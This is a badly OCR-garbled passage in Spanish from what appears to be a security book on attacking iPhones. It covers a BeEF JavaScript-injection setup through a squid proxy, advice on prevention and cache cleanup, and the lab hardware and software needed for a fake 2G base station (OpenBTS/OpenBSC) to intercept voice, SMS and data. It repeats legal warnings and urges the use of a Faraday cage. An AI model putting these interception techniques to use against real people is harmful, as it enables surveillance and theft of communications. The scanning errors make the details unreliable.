<me.ía  iLaí:Lt.^="apple- itunes -app"  oc-nc<^nt.-" a-op--  LorElOv  afíiliate 

da  t  a-nyA  f  fi  1 1  ^  t.  Ua  L  ,  rj.£ :  £.>-  □  rg-jiae  n  t^nyURL  "  > 

Este  hug  ha  sirio  corregido  en  la  versión  6J  del  sistema  operativo  iOS. 
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Brnwscr  Exploitatlon  Frainework  Project 

Para  quien  no  lo  conozca^  BeiiP'  Exploitation  Framework  Project}  es  una  robus  la 

iierr amienta  para  realizar  test  de  intrusión  iiiediaiite  JavaScript  para  la  cxplolaciÓTi  de  n avoír adores . 
La  canLidad  de  módulos  y  cjcploits  disponibles  es  enorme,  desde  un  básico  ¿7/eítpara  enviar  mensajes 
a  las  víctimas,  hasta  la  obtención  de  la  posición  geográñea  del  dispositivo  infectado.  Este  framework 
está  desarrollado  en  mhy^  y  dispone  de  un  amigable  panel  de  con  (rol  web  dci^de  el  que  lanzar  los 
paxúoads  a  las  v  fe  Limas  y  ver  los  resultados  recibidos. 

Aunque  originalmente  BeEP  está  pensada  para  entornos  con  vulnerabilidades  XSS,  el  principio  es 
el  mismo:  inyectar  código  JamScripi  en  la  web  que  la  víctima  visita  ya  sea  por  XSS  o  incrustando 
el  código  malicioso  en  el  pn)pío  fichero  js  de  la  pciidón  de  la  víctima.  Una  vez  la  víctima  ha  sido 
infectada,  se  puede  monitorizar  toda  la  información  acerca  del  navegador  de  la  misma,  y  comeiizai 
a  lanzar  los  payloads  oporlunos.  Aunque  esta  herramienta  no  esté  orientada  para  dispositivos 
móviles,  y  por  ello  no  todos  los  payioad^  disponibles  obtienen  resultados  satisfactorios,  una  buena 
combinación  de  ellos  pennite  lecopilai  gran  cantidad  de  ¡nfomiación,  asi  como  realizar  redireceiones 
y  crear  iframes  en  la  web  visitada  por  la  víctima.  Además  dispone  de  un  módulo  de  imeroperabilidad 
con  Metúsploit. 

Para  el  entorno  descrito,  utilizar  BeEE  es  tan  sencillo  como  descaigarlo  de  la  web  oficial,  realizar 
la  instalación  siguiendo  los  pasos  del  ruanual  incluido,  y  rnodiflear  el  poisonpl  que  utiliza 

squid para  realizar  la  infección  de  los  ficheros  JavaScript  solicitados  por  la  victima.  Bn  vez  de  añadir 
el  contenido  del  fichero  pasareíajs,  se  concatenará  el  fichero  hookjs  proporcionado  por  la  propia 
lien  amienta. 


Imagen  1 1.24:  PíiiíbI  de  cuiiUdI  iJt  BíítíP, 
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5.  Prevención  y  desinfección 

Muchos  de  los  ataques  realizados  a  día  de  hoy  csLári  basados  fiiridamentalmente  en  el  desconocimiento, 
la  ingenuidad  y  la  falla  de  interés  de  los  propios  iisiianos.  Es  por  ello  que  la  mayor  medida  de 
prevención  a  tomar  ante  citalquier  ataque  es  el  sentido  común  y  una  buena  base  en  seguridad 
informática. 

Si  se  está  en  posición  de  propietario  (o  administrador  incluso)  de  uno  o  varios  AP  y  se  quiere  evitai 
la  Huplantación  se  dehe  establecer  una  fuerte  política  de  seguridad  En  el  caso  de  redes  eon  el  ave 
compartida  (WPA  -PSK  y  WPA2-PSK,  WEP  queda  desearlado),  eon  veniente  utilizar  una  clave 
lo  sufícieiiteiiieíite  robusta,  eon  una  longitud  de  al  menos  10  caracteres  y  un  charset  completo 
(números,  letras,  símbolos  y  caracteres  especiales).  En  el  caso  de  redes  que  implenieniaii  validación 
contra  servidores  Radíus,  utilizar  siempre  un  certificado  ya  que  su  falsificacTÓfi  es  compleja.  Además 
es  impüiLante  afiadlr  todas  las  capas  de  seguridad  posibles,  como  ocultación  del  ESSID  y  filtrado 
por  mac. 

En  el  caso  de  ser  cliente,  conectarse  única  y  exclusivamente  a  redes  que  se  sepa  que  son  de  confianza 
en  los  que  el  cifrado  sea  suficicuLcnieuLc  robusto.  Además  utilizar  la  misma  configuración  con  JP 
eslúiiea  para  esa  red,  y  de  ser  posible,  confirmar  que  el  punto  de  acceso  al  que  se  está  conectando 
el  equipo  tiene  el  EísSlD  habitual.  Para  casos  de  necesidad  donde  nu  existe  una  red  de  confianza, 
siempre  se  tiene  la  posibilidad  de  optar  por  compartir  la  conexión  del  dispositivo  3G  si  existe  la 
ojición,  y  en  caso  contrario  navegar  lo  Justo  y  necesario,  evitando  kido  lo  posible  iniciar  sesión  en 
cualquier  web. 

Como  se  ha  visto  aoLeriormente,  al  atíu|úejde  JS  Búinef  consiste  en  la  persistencia  de  los  ficheros 
JavaScript  cacheados  con  expiración  infinita,  por  lo  que  la  des  infección  pasa  por  ser  tan  scimilla 
como  realizar  una  limpieza  de  la  caché.  Una  buena  práctica  cuando  no  se  está  conectado  a  una  red 
de  confianza  consiste  en  la  utilización  de  la  navegación  'femporaf’  de  muchos  de  los  navegadores 
actuales  (  el  llamado  modo  seguro,  ItiPrivate  o  incógnito),  ya  que  en  tal  caso  aunque  el  equipo  quede 
infectado  con  JawiScnpt  malicioso,  este  desaparecerá  al  cerrar  c1  navegador,  quedando  el  equipo 
intacto. 

Para  el  castí  concreto  íle  iPhoue,  existe  la  opción  de  deshabilitar  la  ejecución  JavaScript  en  Safari 
desde  la  sección  Safari  situada  en  los  del  dispositivo,  con  lo  que  en  Lal  caso  no  llegaría  a 

ejecutarse  el  código  malicioso,  (el  inconveniente  es  que  algunas  webs  con  toda  seguridad  perderían 
una  gran  parte  íie  su  funcionalidad),  o  de  utilizar  el  Modo  Privado,  por  lo  que  no  se  almacenarían  los 
ficheros  infectados  en  caché,  tal  y  como  se  ha  meiicíonado  anteijorniCTiic.  Pero  si  de  verdad  lo  que 
se  quiere  realizai  es  una  limpieza  de  la  caché,  basta  con  acceder  a  Ajustes^  Safarf^  Borrar  cookies  >■ 
datos. 

La  siguiente  imagen  muestra  este  último  caso,  con  un  lógico  y  claro  niciisajc  de  advertencia  de  las 
c  onse  c  uciic  i  a  s  de  realizar  c  sia  acci  ón . 
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Se  borrarán  tos  datos  que  pueden  utilizarse 
para  controlar  su.  navegaoión,  pero  que  algunos 
sitios  web  usan  para  guardar  datos  de  inioio  de 
sesión  y  acelerar  ta  návegaGión.  Todas  Jas 
pestañas  abiertas  ^  cerrarán. 


Borrar  cookies  y  datos 


Cancelar 


Imagen  J  1.25:  Borrado  de  datos  de  caché  en  IPhon^ 


Capitulo  XJh  Ataques  GSM-GPRS  a  iPhone 
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Capítulo  Xn 

Ataques  GSM-GPRS  a  iPhone 


1,  Introducción 


Las  comiuiicaciones  j  no  viles  (2G/3G)  son  desde  hace  años,  y  cada  vez  más,  uno  de  los  principales 
can  al  es  par  los  que  viaja  inrormacíón  muy  crítica  de  la  mayoría  de  las  organizaciones.  Sin  embargo, 
cuando  se  realizan  pruebas  de  intrusián,  las  comiimcaciones  2G/3G  suelen  quedar  fuera  del  alcance 
de  dichas  pniebas,  como  si  se  con  si  deramo  segura  s,  lo  cua!  es  un  erron 

En  el  pasado  era  difícil  analizar  la  seguridad  de  las  comunicaciones  2G/3G  de  una  organización,  por 
la  ausencia  de  herramientas  pam  ello  con  un  coste  razonable.  Pero  esto  ya  no  es  excusa:  la  aparición 
en  los  últ^nos  anos  de  dispositivos  hardware  de  relativamente  bajo  costo  y  de  íierramicnüLs  software 
de  libre  distribución,  ha  puesto  los  medios  necesarios  al  alcance  de  ciialquiera. 

En  es  Le  capítulo  se  describe  una  sene  de  herramientas  disponibles  y  cómo  éstas  se  pueden  emplear 
para  realizar  ataques  sobre  distintos  aspectos  de  las  comunicaciones  móviles  de  un  dispositivo  como 
el  iPhoue.  Con  ello  se  pretende  que  el  leclor  sea  capaz  de  realizar  dichos  ataques. 

Ko  obstante,  debe  leiicisc  en  cuenia  que,  por  supuesto,  los  habiruales  avisos  de  exención  de 
responsabilidad  íiplícan  también  en  este  caso:  antes  de  realizar  cualquiera  de  los  ataques  descritos 
aquí,  el  lector  debe  aseguiBrse  de  conocer  cualquier  riesgo  legal  en  el  que  pudiera  ineuirir, 
coiiEulUirido  a  cuantas  fucnLc^s  considere  oportunas.  Esta  precanción,  que  es  necesaria  de  cara  a 
realizar  cualquier  actividad  de  una  prueba  de  intrusión,  en  el  caso  de  las  comunicaciones  móviles 
es  aún  más  importante  si  cabe,  ya  que  el  simple  hecho  de  emitir  señales  GSM  en  las  bandas  de 
ñecuencia  asignadas  para  ello,  sin  disponer  de  una  licencia,  constituye  en  sí  mismo  una  violación 
de  las  leyes,  a  diferencia  de  lo  que  sucede  con  otras  comunicaciones,  como  ^Vi-Fi  o  Bkíeíooth,  que 
utilizan  bandas  de  írecuencia  de  libre  uso, 

Para  evitar  ese  problema  legal,  se  sugiere  reali/ar  todas  las  pruebas  dentro  de  una  jaula  Faj‘admf\ 
como  se  describe  más  adelante.  Ue  este  modo  la  señal  emitida  quedará  confinada  dentro  de  la  jaula, 
y  se  garantizará  que  solo  se  podmn  ver  afectados  por  las  pmebas  aquellos  dispositivos  móviles 
que  hayan  sido  iiitroducidüs  en  ella.  Nt»  obstante,  inclust}  si  se  utiliza  una  jaula  de  Faraday,  se 
recomienda  obtener  asesoramiento  legal  antes  de  realizar  cualquier  prueba. 

:  h!tp://£^AVik¡psdía.úrp/ívikiUúTAlí2  dff  Fíimctav 
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Aviso:  iis  importa  nte  obtener  ases  ora  miento  legal  anres  cíe  realizar  cualquier  pnieba 
de  las  que  se  describen  en  este  capituio,  incluso  si  utiliza  una  jaula  de  Farad€ty>. 


Entre  los  múltiples  ataques  conocidos  contra  comunicaciones  2G/3G,  este  capítulo  se  centra  en 
aquellos  que  se  pueden  llevar  a  cabo  utilizando  una  estación  base  falsa  2G,  poique  con  una  misma 
infraestructura  se  pueden  realizar  una  gran  variedad  de  ataques,  obteniendo  control  mtal  sobre  las 
comunicación  es  de  los  dispositivos  víctima^  tanto  de  voz  como  de  mensajes  cortos  (SMS)  o  de  datos 
(TP)^ 


Los  ataques  que  se  van  a  describir  afectan  soIíí  a  eomuTiicaeioucs  2G,  ya  que  apruvechan  la  falla 
de  autenticación  bidii-eccioiial  de  GSWGFRS,  y  en  prmcipio  no  afectarían  a  3G .  Pero  en  realidad 
Larri  bien  se  pueden  efectuar  conlra  dispositivos  que  son  3G,  poique  la  mayoría  de  estos  dispositivos 
admiten  el  servicio  2G  cuando  no  pueden  obtener  servicio  3G,  y  un  ameantc  ut>  tendría  más  que 
utilizar  un  inhibidor  de  ñecueocias  banda  de  3G  para  hacer  imposible  al  dispositivo 

V  í  c  Li  m  a  í  vb  Lencr  ser  v  i  c  i  o  3  G . 


2,  Herramientas  necesarias  ( 

infraestructura  basada  en  OpenBTS 

Descripción  general  de  componentes 

La  íiifraestrnctnra  basada  en  el  software  de  código  abierto  OpenBTS  puede  iitilizarse  para  emular 
las  capacidades  de  un  atacante  que  pretenda  interceptar  y  niampiilar  comunicaciones  GSM  de 
dispositivos  móviles.  Este  lipu  do  i  n  fracs  truc  luí  a  presenta  un  interfaz  radio  Um  (2G)  a  cualquier 
dispositivo  móvil,  emulando  también  parte  déla  hincionalidad  de  una  red  GSM.  AKimismo,  actúa 
como  pasarela  pam  las  comunicaciones  entre  ese  mterfaz  y  una  red  IP  con  señalización  Sip. 

En  el  momento  de  cseriLura  de  este  capítulo,  OpenBTS  tiene  2  versiones  utilizables:  OpenETS 
2.6  (rama  de  desarrollo  completamente  cerrada  y  terminada)  y  OpenBTS  2.8  (rama  de  desarrollo 
abierta).  La  versión  de  uso  recomendada  es  la  por  varios  motivos"*: 

-  Los  propios  de  sarro  lladores  de  OpenBTS  lo  recomíeiidaii 

-  Ya  no  hay  desarrollo  oficial  sobre  OpenBTS  2. 6 

-  El  soporte  al  driver  UHD  está  descontinuado  en  OpenBTS  2.6  (y  por  tanto  el  soporte  a 
Uidos  los  dísposiLívos  radio  que  no  sean  USRPl)  y  se  ha  trasladado  a  OpenBTS  2.8 


2  hli'p  nGt/ttnrA'ang  i^j^tíhhc 

j  Cn  este  capítulo  haremos  reíérenda  a  las  2  versiones  do  OpefiBISpüi  cumple Liiud  en  la  expoííLiDn. 
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Un  profesional  de  la  informáíica  que  desee  realizar  piuebaH  íIc  ataque  sobre  comunicaciones 
móviles,  emulando  una  ued  GSM  mediante  una  i  n  fracs  truc  tur  a  basada  en  OpenBTS  debe  disponer 
fie  un  laboratorio  con  los  siguientes  eompoiientes: 

*  HW: 

-  Un  dispositivo  de  comniii  cae  iones  de  radio  capaz  de  emitir  en  las  ftecueucias  de  GSM 
(850  MHz,  900  MHZ  y  1800  MHZ),  Este  dispositivo  será  cualquiera  de  los  modelos 
soportados  de  USRP^.  modificado  en  aquellos  casos  donde  sea  necesario  con  iin  reloj  lo 
sufieicn  temen  te  precÍ5o\ 

-  l:n  ordenador  con  sistema  OfKrrativo  ¡Anm-  (recomendado  UbimUt)  donde  insLaíar  ttKÍos 
los  elementos  software. 

-  Cables,  con ect ores,  antenas. 

U  na  jaula  de  Faraday 

-  SW; 

-  Un  dríver  para  gestionar  el  dispositivo  radit>,  que  según  la  versión  puede  ser  lihusrp  de 
GNldiadio  o  bien  UHD. 

-  El  software  OpenBTS,  que  incíiiye  un  modein  radió  y  otros  elementos. 

-  Una  PBX  software  (típicamente  xislerisk  o  freeswitch) 

*  Conectlvidad:  conectiyidad  IP  eon  internet  para  poder  enrutar  llamadas  salientes  desde 
OpenBTS  a  cualquier  númertt  a  través  de  un  proveedor  de  servicios  VoíP  y  también  entrantes  a  ese 
proveedor  (que  luego  podrían  ser  enmiadas  a  los  tenninales  internos  mediante  cootiguraciones 
específicas  en  la  PBX). 


Estos  componentes  se  combinan  para  proporcionar  las  siguientes  funciones: 

•  Emisión  /  recepción  de  radio:  realizada  por  el  dispositivo  raflio  elegido. 

•  Modulación  de  la  señal:  El  softw^ars  de  OpenBTS  implementa  un  módem  software 
denominado  rransceiver,  que  corre  coma  un  proceso  independiente  y  arraTicado  por  el  software 
de  OpenBTS. 

•  Niveles  1 , 2  y  3  del  protocolo:  El  software  de  OpenBTS  hace  uso  del  transce  iver  para  acceder 

al  dispositivo  de  radio  e  implementa  un  subconjimto  fundamental  de  los  protocolos  de  nivel  1 
2y3deGSM.  “  — 

•  En  ruta  miento  de  llamadas:  Las  ftincioncs  de  enrutamiento  de  llamadas  (que  en  una  red 
GSM  son  proporcionadas  por  el  MSC)  son  realizadas  por  una  PBX  software  (típicamente 
Asterísk,  aunque  los  detalles  serán  proporcionados  más  adelante), 

•  Gestión  de  usuarios:  Las  funciones  de  gestión  de  usuarios  de  la  red,  que  son  realizadas  por 
el  VLR  y  HLR  en  una  red  GSM,  son  proporcionadas  también  por  la  infraestructura : 


4  hnp:/4^^i  ut  iitiio.  o  i^frpBmP-ie/piroject^tgnitracfiúfmki/Open'BTSÜl ÍD 

5  hiíp://gmií  mHo.  org/f^dmine/propc  t^/gmmidio/v^^iki/OpiinB  1  ^UHD^locks 
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-  OpcítSTS  2.6:  estas  foiiciones  las  realiza  la  PBX 

-  OpetíBTS  2.8:  estas  funciones  las  realiza  una  base  de  datas  SOtJteJ  en  conjunción  con 
la  PBX 

•  Autenticación  de  usuarios:  La  autenticación  de  usnarios  es  realizada: 

-  OpenBTS  2.6:  direaamenie  mediante  consultas  a  h  PBX 

-  OpenBTS  2.8:  mediante  un  Tiiódulo  específico  para  realizar  esta  función  {stpamhserve) 
que  caiTe  como  proceso  indepetidiente  en  el  mismo  u  olro  servidor  que  OpenBTB 

•  Soporte  a  SMS:  el  servidor  store  and-foTn^ard  para  soporte  a  SMS  se  denoiiiiiia  .miqneiíe  y 
es  snministradíi  jiinU]  eon  el  soílware  OpenBTS  como  elemento  opcional 

•  Aislamiento  del  entorno  de  pruebas;  debido  a  que  el  uso  de  frecuencias  de  radio  está 
fLierleniente  regulado  en  la  mayoría  de  los  países,  así  como  la  Huplaritación  de  operadores  y 
la  captura  de  comunicaeiones,  todas  las  pruebas  de  intrusión  deben  realizarse  en  llti  en  Lomo 
cerrado  y  protegido,  listo  puede  conseguirse  con  una  jaula  de  Faraday  profesional  que  cuente 
con  conectóles  apantallados  al  exterior^ 

F.l  siguicnLc  diagrama  reñeja  un  setup  con  los  componentes  HW  y  SW  más  comunes^  para  una 
infraestructura  basada  en  OpcuBTS2.6  y  las  relaciones  entre  ellos: 


Iniiíg™  f  2.0 1 :  Coinpí>nfint¿íí  típteoí;  de  una  inüaestructuisi  basada  cü  Ope^B  JS  2.6. 


En  las  versiones  de  OpenBTS  2.8  y  postenores  el  diagnima  de  coiiiponeiites  varía  uotablemente 
puesto  que  existen  corii ponentes  distintos  y  otros  son  adicionales.  Aunque  puede  asarse  una 
configuración  multi-BTS,  para  los  propósitos  de  una  prueba  de  intrusión  la  configuración  con  BTS 
única  es  suficiente  y  es  la  que  se  muestra  en  la  figura  siguiente: 

6  Aunquíí  la  prueba  de  intnisióii  esté  autürl:ítijdii  por  un  clie.íite.  con  toda  nrobabilidad  TIO  tieiíe  compctciiLaa  para 
autorizar  d  usu  Ucl  eaptíctio  ladiodéctrico  ni  la  s^jplantacióa  de  orperadotes  de  tclccomuniciieiune^.  QiieremoF  reniaTTcai- 
qut  cualqiiiei  actividad  de  prueba  de  intrusión  sobre  COtnuuieauiürieá  niú  vil  ienlizada  ftiem  déla  jaula  de  F 

es  seíziiramente  ilegal  e  incluso  peligrosa  piim  la  seguridad  de  los  personas,  puesto  que  podríamos  privar  a  determinado 
tcmiinal  de  las  ooniuiiiüLicioiies  de  emergencia  garantizadas  por  la  ley.  Por  esto  dcbeinos  insistir  tu  que  es  extremadainent.s 
irn^Kulaute  realizar  cualquiera  de  las  pruebas  descdtas  cu  este  capÍLiiio  deirLru  de  una  jaula  de 

7  Dbv  i  ámenle  este  elcocuto  no  es  neesbcuio  para  luí  L^tacante  real. 

S  En  apartados  pusleriures  tb  este  c;apíb.iln  se  dstaUau  todos  los  posibles  compon cntíüi  que  piiínleu  realizar  cada 
fui  icicm  al  idad. 
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lina^ri  12.02'  Coraponcrites  típicos  de  una  inihiestTLicluru  bbisada  en  Opt'i^iBTS  2.8. 


Notas  de  instalación  y  configuración 

Bn  este  apartado  se  recogen  las  notas  de  configuración  pertinentes  para  cada  compon  ente  atendiendo 
a  su  uso  específico  para  realizar  pmebas  de  concepto.  La  instalación  y  configurdción  básicas  del 
software,  así  cottie)  insLraecitmes  para  su  uso  están  recogidas  en  las  referencias  que  se  aportan. 


Dispositivos  de  radio  y  drivct*s  asociados 

Los  dispositivos  de  radio  utilizados  por  OpenBTS  son  todos  de  la  fauiilia  de  las  USRP^  {Universal 
Sa(\wam  Rcidio  Peripherai),  Los  soportados  por  OpenBTS  son  los  siguientes 


-  USRPJ :  requiere  la  instalación  del  drlver  ííbusrp  de  GNURaáio^  en  lugar  del  driver  LUID 
que  gestiona  el  resto  de  dispositivos.  La  ijlLinia  vci'sióii  de  GNURndio  que  incluía  este  driveF^ 
es  la  3.  4.2.  Este  driver  ya  no  tiene  soporte  por  parte  de  GNURadio,  Las  iustmeeiiiues  para  la 
instalación  de  GNURadio  pueden  encontrarse  en  la  siguiente  dirección:  htrp://GNURúdio,org/ 
redmine/projeets/ G  NlIRadiü./vi^  ikFJns  tallingGR 

*  USRP2/±N21Ó/IN200  y  lil  00/El  00/El  10:  OpenBTS  hace  uso  dcl  driver  UHD^^  paia 

coíTuinicarse  con  todos  estos  dispositivos.  Es  recomendable  hacer  uso  de  la  versión  2.S  de 
OpefiBTSpnc^io  que,  como  se  ha  comentado,  el  sopítrLc  a  este  drrverrcx]  OpenBTS  estaba  ubicada 
en  algmias  ramas  no  principales  de  desarrollo,  y  está  discontinuado  en  la  versión  2.6  en  fav{>r  de 
la  versión  de  2.8.  La  instalación  del  drh^er  UHD  está  documentada  en  las  referencias  aportadas. 


Nota:  Para  que  OpenBTS  runcione  correctameirte  con  todos  estos  dispositivos  es 
muy  importante  la  precisión  del  reloj.  La  csLación  base  debe  poseer  un  reloj  cuanto 
mas  preciso  mejor,  que  luego  deberá  ajustarse  para  el  adecuar  el  miiestreo  a  un  múl¬ 
tiplo  de  1.3  ^ÍH7.  Más  íníbrruacióri  a  este  respecto  puede  encontrarse  en  hlíp://wusk 
ncT/trac/rangepifbiic/wiki/Clúck^ 


y  hPp://£7i.  wikiptdiü.  fjrg/y.!  á  f/Un!  ví'fji(j!_Soff  \^'ürí^_Km:tio_P£JÍph£frd 
1 0  hPp.  Z/g  ^lunjdío.  oip/fEdfíiine.pmi^c  !s:/gmmdio/w  íkPOpenBTS  UHD 
\  1  htp^:/Zgiiiíyi^dk\oig/reieases/gnuradfo/ 

1 2  a  i  US. 
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PBX 


Asterisk 


Aota:  Se  presupone  ai  lector  conocimientos  básicos  de  fundón  ami  en  lo  y  ctm  figura¬ 
ción  ú^Ásierisk.  Estos  conodmíeníos  pueden  ser  encontrados  en  los  recursos  recogi¬ 
dos  en  hiíp A .síerísk. o rg/get-s tarted. 


tüiicionacoiiylííerí^A:  en  configuración  estándar  (es  lo  que  OpenBTS  denomina  “basic- 
irisLíillaiioif’)  como  PBX.  OpenBTS 2.8  esta  pensada  paia  fLiiicicmai-  coii/l.j/e?7j/(:  *TeaI-tinie'\  aunque 
también  puede  funcionar  con  Axmrtsk  ^"basic  installution’''  como  PBX.  Eu  este  ulltmo  caso,  para  que 
funcione  la  integración  de  la  autenticación  de  OpenBTS  con  Ásterisky  el  enndamiento  dinámico  de 
ñamadas  deben  realizarse  valias  tareas  de  configuración  manual  sobre por  cada  registro,  io 
cual  hace  in  vi  able  su  uso  en  un  entorno  real,  por  lo  que  esta  configuración  no  se  recomienda. 


En  el  caso  de  utilizar /i sí '"basic- insta llation”  (íípicameníe  con  OpenBTS  2.6),  la  iusLaladóu 
del  software  puede  realizarse  tanto  como  paquete  como  compilando  el  código  fliente.  Toda  la 
documentación  relacionada  con  puede  encontrarse  en:  hílp://wwn\Á5lt;rishorg/get-Á'taríed 

y  en:  http://wy^^A\voipAnfo.o}gAviki/view/Áste.risk  \  Síep-by-^iep  í  ¡n.^taUation. 

La  coiitiguración  de  Asterisk  para  su  tuncionamiento  con  OpenBTS  está-íécogida  en  la  siguiente 
ti  ¡rceción :  hííp  ://GNURadi o.  (n-g/redm  m  e/projec  ts/GNURadio/wiki/OpenB  TSSettingUpAs  tensk. 


Asterisk  Real  1  íme 

A  [laitii  de  la  versión  2. 8  OpenBTS prnede  utilizar  la  arquitectura  Rea!  TimF^  de  Asíerisk con  SQlifeJ, 
En  concreto,  es  un  requisito  para  las  instalaciones  muhi-BTS  (no  necesarias  para  las  pruebas  de 
concepto). 

Las  íiistrocciones  de  instalación  y  configuración  del  sistema  para  su  funcionamiento  con  OpmBTS 
pueden  eu  ctjnlraE  se  eu :  hí¿p:/Á\iÁsh.nel/lraLTraiigepub¡ic/wiki'sqi^^ 


Freeswiti'h 

Los  detalles  específicos  de  instalación  de  freesmtch  para  su  funcionamiento  con  OperiBTS  pueden 
eneoiiLrarse  aquí :  http://wuah.  nei/íraü/rungepubiic/wíkí/p^eeswitchConfig 

Solo  como  retereueia,  también  píidna  utü  izarse  fremwUch  para  su  funcionamiento  con  OpenBTS 
2.6  (rama  UCB),  según  las  instrucciones  recogidas  en  esta  dirección:  ¡mp://CNüRadioMrg/redmine/ 
projecls/GNURadio/vvíki/OpenBTSSeUingUpFreeSWiTCH 


OpenB  1 S 

Existen  varios  documentos  que  describcu  el  proceso  de  insUilaeión  de  OpenBTS  y  de  todas  sus 
dependencias  en  función  del  HW  y  S W  utilizado.  El  documento  de  la  wiki  oficial  es  e1  más  completo 
al  respecto  es ;  hííp://wush.  neí/írac/rcmgepublíc/wiki/BuiídlnstaíiRun 


1 3  htipCfrÁ^nv. vo ipAnfo. vr^^'wik iAiewTi ^'ívrh'k  +Re¿riTmie 
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JNota:  para  configuraciones  basadas  en  OpenBTS  2.8.  se  recomienda  crear  el  ñoh^- 
10  /ctc/rsyshgrd/OpenBTSxortf  cotí  el  siguiente  conten  ¡do  para  separar  los  iogs  de 
OpenBTS  a  un  fichero  independiente: 
local?.  *  /var/Iog/üpenBTS.  Íog 


La  configuración  de  OpenBl'S  consiste  en  tina  serie  de  parámetros  que  detemiinan,  por  un  lado,  el 
conecto  fiincionainiento  de  todos  los  elenienios  del  sistema  y  por  otro,  la  configuración  adecuada  de 
la  celda  falsa  para  que  Tune  i  une  d  ataque  de  estación  base  falsa.  Para  el  primer  objetivo^  la  referencia 
y  notas  anteriores  aportan  la  documentación  necesaria,  mientras  que  para  el  segundo  se  comentarán 
los  aspectos  pailiculares  más  adelante  en  este  capítulo. 


Infraestructura  basada  en  OpenBSC 

Descripción  general  de  componentes 

Si  además  de  interceptar  y  manipular  las  comunicaciones  GSM  de  dispositivos  móviles,  se  desea 
también  poder  interceptar  y  manipular  coniunicaciones  de  datos  GPRS/Edgej  entonces  en  lugar  de 
la  ínfiaestiiictui’a  basada  en  OpenBTS.,  tlescrita  en  el  apartado  anterior,  se  puerile  utilizar  la  que  se 
describe  a  continuación,  basada  en  OpenBSC. 

Fiemen  los  hardware 

Los  elementos  haidwai  e  necesarios  son: 

Lila  estación  base  GSM  qLic  scípnilc  GPRS/^c/^^e,  y  que  esté  soportada  por  OpenBSC?'\ 
cíimc  por  cjeTTiplo  las  estaciones  base  nanoBTS  de  IPAccess  (concretamente  el  modelo 
1 65CU  para  banda  de  900  MHz,  o  el  modelo  165G  para  la  banda  de  ISOO  MHz), 

Un  PC  con  sistema  opeiallvo  GARJ/Llniix  donde  irisialar  Lodos  los  clcmcnios  software 
relacionados  con  OpenBSC.  No  es  necesario  que  sea  especialmente  potente:  un  pequeño 
netpc  sin^e  perfectamente.  Puede  incluso  usarse  una  máquina  virtual,  instalada  en  algún 
equipo  ñsico  que  tenga  las  couexiunes  necesEUÉas. 

-  Opcionalmcntc  (recomendado):  un  segundo  PC,  también  con  sistema  operati%'o  GNU/ 
Lim^x,  en  el  que  instalar  todos  los  elementos  de  software  relacionados  con  la  manipulación 
de  tráfico  IP  y  ataque  a  través  del  niismo.  Puede  ulílizarae  una  segunda  máquina  virtual, 
instalada  en  el  mixSmo  equipo  ñsico  que  el  anterior 

-  Cables,  conectores,  antenas.  Más  adelante  se  describen  con  más  detalles  las  conexiones 
necesarias. 

T.  in  a  j  au  I  a  d  e  Faraday  ^ 

14  Además  de  las  rtajjoBTS  de  IPAcce^^,  OpenBSC  soporta  lambién  la  BTS  BS-ll  de  Siemens  y  la  DTS  sysmcDTS  de 

.^ysmocom  compañía  fiindada  por  lütí  crtíudures  de  OpenBSC. 

15  Aunque  la  prnelia.  de  ¡ntruRÍnn  esté  autnrizad.^  jionin  cíiente.  ef^te  con  toda  prohabilidad  nn  tiene  cninpetencja  para 

autorizar  el  uso  deJ  espectro  radio íiccírico  ni  la  siiplaniación  de  operadores  de  laleeomunicaciones.  Queremos  remarear 
que  cualquier  aclividaJ  de  pniebii  de  intrusión  sobre  común  ic  aciones  nióviles  realizada  rueru  de  la  jaula  de  Famíkiy,  es 
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Nflta:  r.as  estaciones  base  nanoBTS  incluyen  unas  pequeñas  anlcnas,  que  son  sufi- 
cientes  para  dar  cobertura  a  sii  alrededor.  No  obstante,  si  se  desea  utilizar  antenas 
directivas,  por  ejemplo,  es  posible  reemplazar  las  pequeñas  antenas  integradas  por 
otras,  conectándolas  mediante  cables  con  conce Lores  de  tipo  SMA. 


Elementos  software 

Los  elementos  software  necesarios  son: 


-  OpenBSC.  \ 

-  Osmt/SGSN  (aplicación  osmo-sgsn,  incluida  en  OpenBSC), 

-  OpenGGSN.  \ 

-  S  i  st  ema  op  er ati vo  GM  U/L  imtx . 

-  LCR  {Límix  Cali  Ronier),  si  se  desea  poder  manipular  las  comunicaciones  de  voz  y  SMS. 

si  se  desea  poder  maTiipulur  las  comunicaciones  de  voz  y  SMS. 

-  Software  de  manipnlación  de  tráfico  TP  o  de  ataque  a  través  de  1?,  como  por  ejemplo, 
IPiabieSj  Wireshark,  Metasploit,  d?ism¿isq,  etcétera,  üpcionalmente  (de  aecho  es  la  opción 
que  se  reeomieuda^^)  este  sofiw'are  puede  instalarse  en  un  equipo  adicioíial  ubicado  entre  el 
equipo  de  OpenBSC  e  Internet. 


Conectividad  con  Internet 

Además  de  los  elementos  liaidvvaie  y  softwaie  descritos,  será  necesario  contar  con  cone^tivtdad 
TP  hacia  Internet,  desde  el  laboratorio,  cuando  este  se  este  utilizando.  Con  ere  lamente,  debe  poder 
llegai'se  a  Internet  desde  el  equipo  GNU/Limix. 


Esta  conexión  a  Internet  es  necesai  ía  para  enrutar  a  ü'avés  de  ella  todo  ei  tráfico  IP  de  las  conexiones 
de  dalos  de  los  dispositivos  móviles  vieLima,  y  también  para  enrutar  a  través  de  ella,  utilizando  VoP, 
las  llamadas  externas  de  voz  que  se  quiera  cursar,  igual  que  se  describió  en  el  caso  del  kboratono 
basado  en  OpenBTS. 


l.a  Lcenología  empleada  para  obtener  esa  coiieclividad  puede  ser  de  cualquier  tipo:  Wi-FL  3G  a 
través  de  modem  USB,  conexión  eThemet  con  salida  piw  ADSL  o  cable,  ele. 


Alt]  uiteci  lira  ^ 

En  el  siguieiile  diagrama  se  muestra  un  posible  montaje  de  un  laboratorio  con  los  componentes  IIW 
y  S  W  de  una  i  n  fracs  Ir  uc  luía  basada  en  OpenBSC^  y  a  continuación  se  describe  dicho  montaje. 


ibgal  e  incluso  pdigrofta  para  la  seguridad  de  las  personas,  puesto  que  podríamos  privar  a  delerniiiiado  leimmal  de  lus 
eomurjicacioECS  de  oiuergcncia  garantizadas  por  la  ley.  Por  ealu  debtiuius  insitlii  en  que  e&  extreiuadaíiieute  ínipoiiante 
reiilmii  cualquiera  de  las  pruebas  descritas  en  este  capitulo  deniTo  de  una  jaula  de  Faraáay. 

16  disparar  el  soíbv'are  ds  manipulación  de  tráfico  ir  en  un  segundo  equipo,  permite  que  dicho  equipo  pueda  ser  reulil izado, 
